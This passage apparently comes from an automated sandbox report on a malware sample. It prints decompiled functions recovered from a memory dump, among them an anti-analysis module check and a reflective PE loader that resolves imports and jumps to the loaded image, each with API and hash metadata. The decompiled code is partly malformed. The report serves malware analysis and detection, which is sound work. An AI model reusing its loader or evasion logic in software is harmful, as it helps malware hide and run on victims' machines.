                                    					if(_t227 >= _v16) {
                                    						L7:
                                    						if(_t253 != 4) {
                                    							L10:
                                    							_t269 = 0;
                                    							__eflags = 0;
                                    						} else {
                                    							_t285 = _t227 - _t195;
                                    							if(_t227 != _t195) {
                                    								goto L10;
                                    							} else {
                                    								_t269 = _t253 - 3;
                                    							}
                                    						}
                                    						E10015D90(_t272, _t272, 0, 0, _t269);
                                    						_t18 = _t272 + 0x14; // 0xc703f045
                                    						_t19 = _t272 + 8; // 0x8d000040
                                    						 *( *_t18 +  *_t19 - 4) = _t227;
                                    						_t22 = _t272 + 0x14; // 0xc703f045
                                    						_t23 = _t272 + 8; // 0x8d000040
                                    						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                    						_t26 = _t272 + 0x14; // 0xc703f045
                                    						_t27 = _t272 + 8; // 0x8d000040
                                    						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                    						_t30 = _t272 + 0x14; // 0xc703f045
                                    						_t31 = _t272 + 8; // 0x8d000040
                                    						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                    						E10014AF0(_t285,  *_t272);
                                    						_t202 = _v8;
                                    						_t273 = _t273 + 0x14;
                                    						if(_t202 != 0) {
                                    							_t208 =  >  ? _t227 : _t202;
                                    							_v8 = _t208;
                                    							_t36 = _t272 + 0x38; // 0xf47d8bff
                                    							_t37 = _t272 + 0x5c; // 0x84e85000
                                    							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                    							_t273 = _t273 + 0xc;
                                    							_t252 = _v8;
                                    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                    							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                    							_t227 = _t227 - _t252;
                                    						}
                                    						if(_t227 != 0) {
                                    							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
                                    							_t273 = _t273 + 0xc;
                                    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                    						}
                                    						_t253 = _a8;
                                    						if(_t269 == 0) {
                                    							continue;
                                    						}
                                    					} else {
                                    						if(_t227 != 0 || _t253 == 4) {
                                    							if(_t253 != 0 && _t227 == _t195) {
                                    								goto L7;
                                    							}
                                    						}
                                    					}
                                    					break;
                                    				}
                                    				_t142 =  *_t272;
                                    				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                    				_a4 = _t232;
                                    				if(_t232 == 0) {
                                    					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                    					_t254 =  *_t83;
                                    				} else {
                                    					_t59 = _t272 + 0x2c; // 0x8df075ff
                                    					_t224 =  *_t59;
                                    					if(_t232 < _t224) {
                                    						_t65 = _t272 + 0x3c; // 0x830cc483
                                    						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                    						_t260 =  *_t66;
                                    						__eflags =  *_t65 - _t260 - _t232;
                                    						if( *_t65 - _t260 <= _t232) {
                                    							_t67 = _t272 + 0x38; // 0xf47d8bff
                                    							_t261 = _t260 - _t224;
                                    							 *(_t272 + 0x6c) = _t261;
                                    							memcpy( *_t67,  *_t67 + _t224, _t261);
                                    							_t70 = _t272 + 0x16b0; // 0xdf750008
                                    							_t188 =  *_t70;
                                    							_t273 = _t273 + 0xc;
                                    							_t232 = _a4;
                                    							__eflags = _t188 - 2;
                                    							if(_t188 < 2) {
                                    								_t189 = _t188 + 1;
                                    								__eflags = _t189;
                                    								 *(_t272 + 0x16b0) = _t189;
                                    							}
                                    						}
                                    						_t73 = _t272 + 0x38; // 0xf47d8bff
                                    						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                    						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                    						_t225 = _a4;
                                    						_t273 = _t273 + 0xc;
                                    						_t76 = _t272 + 0x6c;
                                    						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                    						__eflags =  *_t76;
                                    						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                    						_t184 =  *_t78;
                                    						_t79 = _t272 + 0x2c; // 0x8df075ff
                                    						_t239 =  *_t79;
                                    					} else {
                                    						 *(_t272 + 0x16b0) = 2;
                                    						_t61 = _t272 + 0x38; // 0xf47d8bff
                                    						memcpy( *_t61,  *_t142 - _t224, _t224);
                                    						_t62 = _t272 + 0x2c; // 0x8df075ff
                                    						_t184 =  *_t62;
                                    						_t273 = _t273 + 0xc;
                                    						_t225 = _a4;
                                    						_t239 = _t184;
                                    						 *(_t272 + 0x6c) = _t184;
                                    					}
                                    					_t254 = _t184;
                                    					 *(_t272 + 0x5c) = _t184;
                                    					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                                    					_t185 =  *_t81;
                                    					_t240 = _t239 - _t185;
                                    					_t241 =  <=  ? _t225 : _t240;
                                    					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                    					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                    				}
                                    				if( *(_t272 + 0x16c0) < _t254) {
                                    					 *(_t272 + 0x16c0) = _t254;
                                    				}
                                    				if(_t269 == 0) {
                                    					_t218 = _a8;
                                    					__eflags = _t218;
                                    					if(_t218 == 0) {
                                    						L34:
                                    						_t89 = _t272 + 0x3c; // 0x830cc483
                                    						_t219 =  *_t272;
                                    						_t145 =  *_t89 - _t254 - 1;
                                    						_a4 =  *_t272;
                                    						_t234 = _t254;
                                    						_v16 = _t145;
                                    						_v8 = _t254;
                                    						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                    						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                    							_v8 = _t254;
                                    							_t95 = _t272 + 0x5c; // 0x84e85000
                                    							_a4 = _t219;
                                    							_t234 = _t254;
                                    							_t97 = _t272 + 0x2c; // 0x8df075ff
                                    							__eflags =  *_t95 -  *_t97;
                                    							if( *_t95 >=  *_t97) {
                                    								_t98 = _t272 + 0x2c; // 0x8df075ff
                                    								_t167 =  *_t98;
                                    								_t259 = _t254 - _t167;
                                    								_t99 = _t272 + 0x38; // 0xf47d8bff
                                    								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                    								 *(_t272 + 0x6c) = _t259;
                                    								memcpy( *_t99, _t167 +  *_t99, _t259);
                                    								_t103 = _t272 + 0x16b0; // 0xdf750008
                                    								_t170 =  *_t103;
                                    								_t273 = _t273 + 0xc;
                                    								__eflags = _t170 - 2;
                                    								if(_t170 < 2) {
                                    									_t172 = _t170 + 1;
                                    									__eflags = _t172;
                                    									 *(_t272 + 0x16b0) = _t172;
                                    								}
                                    								_t106 = _t272 + 0x2c; // 0x8df075ff
                                    								_t145 = _v16 +  *_t106;
                                    								__eflags = _t145;
                                    								_a4 =  *_t272;
                                    								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                    								_t234 =  *_t108;
                                    								_v8 = _t234;
                                    							}
                                    						}
                                    						_t255 = _a4;
                                    						_t220 =  *((intOrPtr*)(_a4 + 4));
                                    						__eflags = _t145 - _t220;
                                    						_t221 =  <=  ? _t145 : _t220;
                                    						_t146 = _t221;
                                    						_a4 = _t221;
                                    						_t222 = _a8;
                                    						__eflags = _t146;
                                    						if(_t146 != 0) {
                                    							_t114 = _t272 + 0x38; // 0xf47d8bff
                                    							E10014C30(_t255,  *_t114 + _v8, _t146);
                                    							_t273 = _t273 + 0xc;
                                    							_t117 = _t272 + 0x6c;
                                    							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                    							__eflags =  *_t117;
                                    							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                    							_t234 =  *_t119;
                                    						}
                                    						__eflags =  *(_t272 + 0x16c0) - _t234;
                                    						if( *(_t272 + 0x16c0) < _t234) {
                                    							 *(_t272 + 0x16c0) = _t234;
                                    						}
                                    						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                                    						_t123 = _t272 + 0xc; // 0x452bf84d
                                    						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                    						__eflags = _t257 - 0xffff;
                                    						_t258 =  >  ? 0xffff : _t257;
                                    						_t124 = _t272 + 0x2c; // 0x8df075ff
                                    						_t151 =  *_t124;
                                    						_t125 = _t272 + 0x5c; // 0x84e85000
                                    						_t235 = _t234 -  *_t125;
                                    						__eflags = _t258 - _t151;
                                    						_t152 =  <=  ? _t258 : _t151;
                                    						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                    						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                    							L49:
                                    							__eflags = _t235 - _t258;
                                    							_t154 =  >  ? _t258 : _t235;
                                    							_a4 =  >  ? _t258 : _t235;
                                    							__eflags = _t222 - 4;
                                    							if(_t222 != 4) {
                                    								L53:
                                    								_t269 = 0;
                                    								__eflags = 0;
                                    							} else {
                                    								_t161 =  *_t272;
                                    								__eflags =  *(_t161 + 4);
                                    								_t154 = _a4;
                                    								if( *(_t161 + 4) != 0) {
                                    									goto L53;
                                    								} else {
                                    									__eflags = _t154 - _t235;
                                    									if(_t154 != _t235) {
                                    										goto L53;
                                    									} else {
                                    										_t269 = _t222 - 3;
                                    									}
                                    								}
                                    							}
                                    							_t131 = _t272 + 0x38; // 0xf47d8bff
                                    							_t132 = _t272 + 0x5c; // 0x84e85000
                                    							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                    							_t134 = _t272 + 0x5c;
                                    							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                    							__eflags =  *_t134;
                                    							E10014AF0( *_t134,  *_t272);
                                    						} else {
                                    							__eflags = _t235;
                                    							if(_t235 != 0) {
                                    								L46:
                                    								__eflags = _t222;
                                    								if(_t222 != 0) {
                                    									_t162 =  *_t272;
                                    									__eflags =  *(_t162 + 4);
                                    									if( *(_t162 + 4) == 0) {
                                    										__eflags = _t235 - _t258;
                                    										if(_t235 <= _t258) {
                                    											goto L49;
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								__eflags = _t222 - 4;
                                    								if(_t222 == 4) {
                                    									goto L46;
                                    								}
                                    							}
                                    						}
                                    						asm("sbb edi, edi");
                                    						_t271 =  ~_t269 & 0x00000002;
                                    						__eflags = _t271;
                                    						return _t271;
                                    					} else {
                                    						__eflags = _t218 - 4;
                                    						if(_t218 == 4) {
                                    							goto L34;
                                    						} else {
                                    							_t173 =  *_t272;
                                    							__eflags =  *(_t173 + 4);
                                    							if( *(_t173 + 4) != 0) {
                                    								goto L34;
                                    							} else {
                                    								_t88 = _t272 + 0x5c; // 0x84e85000
                                    								__eflags = _t254 -  *_t88;
                                    								if(_t254 !=  *_t88) {
                                    									goto L34;
                                    								} else {
                                    									return 1;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					return 3;
                                    				}
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                    • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                                    • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                    • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                    				char _v516;
                                    				char _v556;
                                    				char _v564;
                                    				char _v568;
                                    				char _v572;
                                    				char _v576;
                                    				intOrPtr _v580;
                                    				char _v588;
                                    				signed int _v596;
                                    				intOrPtr _v602;
                                    				intOrPtr _v604;
                                    				char _v608;
                                    				CHAR* _v612;
                                    				CHAR* _v616;
                                    				signed int _v620;
                                    				signed int _v624;
                                    				signed int _v628;
                                    				signed int _v632;
                                    				char _v636;
                                    				intOrPtr _t119;
                                    				signed int _t122;
                                    				CHAR* _t124;
                                    				intOrPtr _t125;
                                    				CHAR* _t127;
                                    				WCHAR* _t130;
                                    				intOrPtr _t133;
                                    				intOrPtr _t137;
                                    				WCHAR* _t138;
                                    				intOrPtr _t142;
                                    				WCHAR* _t143;
                                    				CHAR* _t144;
                                    				intOrPtr _t145;
                                    				intOrPtr _t150;
                                    				intOrPtr _t153;
                                    				WCHAR* _t154;
                                    				signed int _t159;
                                    				WCHAR* _t160;
                                    				intOrPtr _t163;
                                    				intOrPtr _t165;
                                    				intOrPtr _t166;
                                    				intOrPtr _t170;
                                    				signed int _t173;
                                    				signed int _t178;
                                    				intOrPtr _t182;
                                    				WCHAR* _t184;
                                    				char _t186;
                                    				WCHAR* _t188;
                                    				intOrPtr _t200;
                                    				intOrPtr _t211;
                                    				signed int _t215;
                                    				char _t220;
                                    				WCHAR* _t231;
                                    				intOrPtr _t235;
                                    				intOrPtr _t238;
                                    				intOrPtr _t239;
                                    				intOrPtr _t246;
                                    				signed int _t248;
                                    				WCHAR* _t249;
                                    				CHAR* _t250;
                                    				intOrPtr _t262;
                                    				void* _t271;
                                    				intOrPtr _t272;
                                    				signed int _t277;
                                    				void* _t278;
                                    				intOrPtr _t280;
                                    				signed int _t282;
                                    				void* _t298;
                                    				void* _t299;
                                    				intOrPtr _t305;
                                    				CHAR* _t326;
                                    				void* _t328;
                                    				WCHAR* _t329;
                                    				intOrPtr _t331;
                                    				WCHAR* _t333;
                                    				signed int _t335;
                                    				intOrPtr* _t337;
                                    				void* _t338;
                                    				void* _t339;
                                    				void* _t353;
                                    
                                    				_t353 = __fp0;
                                    				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                                    				_t119 =  *0x1001e688; // 0x7900590
                                    				_v620 = _v620 & 0x00000000;
                                    				_t328 = __ecx;
                                    				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                                    					L7:
                                    					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
                                    					E1000A86D( &_v556, _t14, _t351);
                                    					_t298 = 0x64;
                                    					_t122 = E1000A471( &_v556, _t298);
                                    					 *0x1001e748 = _t122;
                                    					if(_t122 != 0) {
                                    						_push(0x4e5);
                                    						_t299 = 0x10;
                                    						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
                                    						 *_t337 = 0x610;
                                    						_t124 = E100095E1(0x1001b9cc);
                                    						_push(0);
                                    						_push(_t124);
                                    						_v612 = _t124;
                                    						_t125 =  *0x1001e688; // 0x7900590
                                    						_t127 = E100092E5(_t125 + 0x228);
                                    						_t338 = _t337 + 0xc;
                                    						_v616 = _t127;
                                    						E100085D5( &_v612);
                                    						_t130 = E1000B269(_t127);
                                    						_t246 = 3;
                                    						__eflags = _t130;
                                    						if(_t130 != 0) {
                                    							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                                    							 *_t328 = _t246;
                                    						}
                                    						E1000861A( &_v616, 0xfffffffe);
                                    						_t133 =  *0x1001e688; // 0x7900590
                                    						_t22 = _t133 + 0x114; // 0x79006a4
                                    						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                                    						_t262 =  *0x1001e688; // 0x7900590
                                    						_t339 = _t338 + 0x14;
                                    						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                                    						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                                    							L17:
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							_v572 = _t328;
                                    							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                                    							_t137 =  *0x1001e680; // 0x0
                                    							_t138 =  *(_t137 + 8);
                                    							__eflags = _t138;
                                    							if(_t138 != 0) {
                                    								 *_t138(0, 0, 1,  &_v568,  &_v564);
                                    							}
                                    							_v620 = _v620 & 0x00000000;
                                    							E1000E2C6(_t353,  &_v576);
                                    							_pop(_t262);
                                    							_t142 =  *0x1001e6b4; // 0x797fc48
                                    							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                                    							__eflags = _t143;
                                    							if(_t143 == 0) {
                                    								E1000E2C6(_t353,  &_v588);
                                    								_t235 =  *0x1001e6b4; // 0x797fc48
                                    								_pop(_t262);
                                    								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                                    							}
                                    							__eflags =  *0x1001e73c;
                                    							if( *0x1001e73c <= 0) {
                                    								goto L36;
                                    							} else {
                                    								_t165 =  *0x1001e680; // 0x0
                                    								__eflags =  *(_t165 + 8);
                                    								if( *(_t165 + 8) != 0) {
                                    									_t231 =  *(_t165 + 0xc);
                                    									__eflags = _t231;
                                    									if(_t231 != 0) {
                                    										 *_t231(_v580);
                                    									}
                                    								}
                                    								_t166 =  *0x1001e688; // 0x7900590
                                    								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                                    								__eflags = _t262 - _t246;
                                    								if(_t262 == _t246) {
                                    									goto L36;
                                    								} else {
                                    									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                                    									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                                    										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                                    										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                                    											E100049A5();
                                    											asm("stosd");
                                    											asm("stosd");
                                    											asm("stosd");
                                    											asm("stosd");
                                    											_t170 =  *0x1001e684; // 0x797faa0
                                    											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                                    											_t262 = _v602;
                                    											_t248 = 0x3c;
                                    											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                                    											_v596 = _t173;
                                    											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                                    											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                                    											_v624 = _t178;
                                    											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                                    											_t182 =  *0x1001e688; // 0x7900590
                                    											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                                    											_t339 = _t339 + 0xc;
                                    											__eflags = _t184;
                                    											if(_t184 >= 0) {
                                    												_t333 = E10008604(0x1000);
                                    												_v616 = _t333;
                                    												_pop(_t262);
                                    												__eflags = _t333;
                                    												if(_t333 != 0) {
                                    													_t186 = E1000109A(_t262, 0x148);
                                    													_t305 =  *0x1001e688; // 0x7900590
                                    													_v636 = _t186;
                                    													_push(_t305 + 0x648);
                                    													_push(0xa);
                                    													_push(7);
                                    													_t271 = 2;
                                    													E1000902D(_t271,  &_v572);
                                    													_t272 =  *0x1001e688; // 0x7900590
                                    													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                                    													_t339 = _t339 + 0x18;
                                    													_v632 = _t188;
                                    													__eflags = _t188;
                                    													if(_t188 != 0) {
                                    														_push(_v624 % _t248 & 0x0000ffff);
                                    														_push(_v628 & 0x0000ffff);
                                    														_push(_v596 % _t248 & 0x0000ffff);
                                    														_push(_v620 & 0x0000ffff);
                                    														_push(_v632);
                                    														_push( &_v572);
                                    														_t200 =  *0x1001e688; // 0x7900590
                                    														__eflags = _t200 + 0x1020;
                                    														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
                                    														E100085D5( &_v636);
                                    														E1000A911(_t333, 0, 0xbb8, 1);
                                    														E1000861A( &_v632, 0xfffffffe);
                                    														_t339 = _t339 + 0x44;
                                    													}
                                    													E1000861A( &_v616, 0xfffffffe);
                                    													_pop(_t262);
                                    												}
                                    											}
                                    										}
                                    										goto L36;
                                    									}
                                    									__eflags = _t262 - 2;
                                    									if(_t262 != 2) {
                                    										goto L36;
                                    									}
                                    									E100049A5();
                                    									asm("stosd");
                                    									asm("stosd");
                                    									asm("stosd");
                                    									asm("stosd");
                                    									_t211 =  *0x1001e684; // 0x797faa0
                                    									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                                    									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                                    									_v628 = _t215;
                                    									_t277 = 0x3c;
                                    									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                                    									_t249 = E10008604(0x1000);
                                    									_v624 = _t249;
                                    									_pop(_t278);
                                    									__eflags = _t249;
                                    									if(_t249 != 0) {
                                    										_t220 = E100095E1(_t278, 0x32d);
                                    										_t280 =  *0x1001e688; // 0x7900590
                                    										_push(_t280 + 0x228);
                                    										_t282 = 0x3c;
                                    										_v636 = _t220;
                                    										_push(_v628 % _t282 & 0x0000ffff);
                                    										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                                    										E100085D5( &_v636);
                                    										E1000A911(_t249, 0, 0xbb8, 1);
                                    										E1000861A( &_v624, 0xfffffffe);
                                    									}
                                    									goto L41;
                                    								}
                                    							}
                                    						} else {
                                    							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                                    							__eflags = _t238 - _t246;
                                    							if(_t238 == _t246) {
                                    								goto L17;
                                    							}
                                    							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                    							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                    								L36:
                                    								_t144 = E100095E1(_t262, 0x610);
                                    								_push(0);
                                    								_push(_t144);
                                    								_v616 = _t144;
                                    								_t145 =  *0x1001e688; // 0x7900590
                                    								_t329 = E100092E5(_t145 + 0x228);
                                    								_v612 = _t329;
                                    								__eflags = _t329;
                                    								if(_t329 != 0) {
                                    									_t160 = E1000B269(_t329);
                                    									__eflags = _t160;
                                    									if(_t160 != 0) {
                                    										_t163 =  *0x1001e684; // 0x797faa0
                                    										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                    									}
                                    									E1000861A( &_v612, 0xfffffffe);
                                    								}
                                    								E100085D5( &_v616);
                                    								_t150 =  *0x1001e688; // 0x7900590
                                    								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
                                    								_t153 =  *0x1001e688; // 0x7900590
                                    								_t154 = _t153 + 0x228;
                                    								__eflags = _t154;
                                    								lstrcpynW(_t154,  *0x1001e738, 0x105);
                                    								_t331 =  *0x1001e688; // 0x7900590
                                    								_t117 = _t331 + 0x228; // 0x79007b8
                                    								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
                                    								E1000861A(0x1001e740, 0xfffffffe);
                                    								E1000861A(0x1001e738, 0xfffffffe);
                                    								L41:
                                    								_t159 = 0;
                                    								__eflags = 0;
                                    								L42:
                                    								return _t159;
                                    							}
                                    							__eflags = _t238 - 2;
                                    							if(_t238 != 2) {
                                    								goto L36;
                                    							}
                                    							goto L17;
                                    						}
                                    					}
                                    					L8:
                                    					_t159 = _t122 | 0xffffffff;
                                    					goto L42;
                                    				}
                                    				_t250 = E100095C7(0x6e2);
                                    				_v616 = _t250;
                                    				_t326 = E100095C7(0x9f5);
                                    				_v612 = _t326;
                                    				if(_t250 != 0 && _t326 != 0) {
                                    					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                    						_v620 = 1;
                                    					}
                                    					E100085C2( &_v616);
                                    					_t122 = E100085C2( &_v612);
                                    					_t351 = _v620;
                                    					if(_v620 != 0) {
                                    						goto L8;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                                    • lstrcpynW.KERNEL32(07900158,00000105), ref: 1000526F
                                    • lstrcpynW.KERNEL32(07900368,00000105), ref: 10005283
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: HandleModulelstrcpyn
                                    • String ID:
                                    • API String ID: 3430401031-0
                                    • Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                                    • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                                    • Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                                    • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                    				signed int _v5;
                                    				signed short _v12;
                                    				intOrPtr* _v16;
                                    				signed int* _v20;
                                    				intOrPtr _v24;
                                    				unsigned int _v28;
                                    				signed short* _v32;
                                    				struct HINSTANCE__* _v36;
                                    				intOrPtr* _v40;
                                    				signed short* _v44;
                                    				intOrPtr _v48;
                                    				unsigned int _v52;
                                    				intOrPtr _v56;
                                    				_Unknown_base(*)()* _v60;
                                    				signed int _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				unsigned int _v76;
                                    				intOrPtr _v80;
                                    				signed int _v84;
                                    				intOrPtr _v88;
                                    				signed int _t149;
                                    				void* _t189;
                                    				signed int _t194;
                                    				signed int _t196;
                                    				intOrPtr _t236;
                                    
                                    				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                    				_v24 = _v72;
                                    				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                    				_v56 = _t236;
                                    				if(_t236 == 0) {
                                    					L13:
                                    					while(0 != 0) {
                                    					}
                                    					_push(8);
                                    					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                    						L35:
                                    						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                    						while(0 != 0) {
                                    						}
                                    						if(_a12 != 0) {
                                    							 *_a12 = _v68;
                                    						}
                                    						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                    						return _v68(_a4, 1, _a8);
                                    					}
                                    					_v84 = 0x80000000;
                                    					_t149 = 8;
                                    					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                    						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                    						if(_v36 == 0) {
                                    							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                    						}
                                    						if(_v36 != 0) {
                                    							if( *_v16 == 0) {
                                    								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                    							} else {
                                    								_v20 =  *_v16 + _a4;
                                    							}
                                    							_v64 = _v64 & 0x00000000;
                                    							while( *_v20 != 0) {
                                    								if(( *_v20 & _v84) == 0) {
                                    									_v88 =  *_v20 + _a4;
                                    									_v60 = GetProcAddress(_v36, _v88 + 2);
                                    								} else {
                                    									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                    								}
                                    								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                    									 *_v20 = _v60;
                                    								} else {
                                    									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                    								}
                                    								_v20 =  &(_v20[1]);
                                    								_v64 = _v64 + 4;
                                    							}
                                    							_v16 = _v16 + 0x14;
                                    							continue;
                                    						} else {
                                    							_t189 = 0xfffffffd;
                                    							return _t189;
                                    						}
                                    					}
                                    					goto L35;
                                    				}
                                    				_t194 = 8;
                                    				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                    				_t196 = 8;
                                    				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                    				while(0 != 0) {
                                    				}
                                    				while(_v48 > 0) {
                                    					_v28 = _v44[2];
                                    					_v48 = _v48 - _v28;
                                    					_v28 = _v28 - 8;
                                    					_v28 = _v28 >> 1;
                                    					_v32 =  &(_v44[4]);
                                    					_v80 = _a4 +  *_v44;
                                    					_v52 = _v28;
                                    					while(1) {
                                    						_v76 = _v52;
                                    						_v52 = _v52 - 1;
                                    						if(_v76 == 0) {
                                    							break;
                                    						}
                                    						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                    						_v12 =  *_v32 & 0xfff;
                                    						_v40 = (_v12 & 0x0000ffff) + _v80;
                                    						if((_v5 & 0x000000ff) != 3) {
                                    							if((_v5 & 0x000000ff) == 0xa) {
                                    								 *_v40 =  *_v40 + _v56;
                                    							}
                                    						} else {
                                    							 *_v40 =  *_v40 + _v56;
                                    						}
                                    						_v32 =  &(_v32[1]);
                                    					}
                                    					_v44 = _v32;
                                    				}
                                    				goto L13;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                                    • LoadLibraryA.KERNEL32(?), ref: 10012C65
                                    • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                                    Memory Dump Source
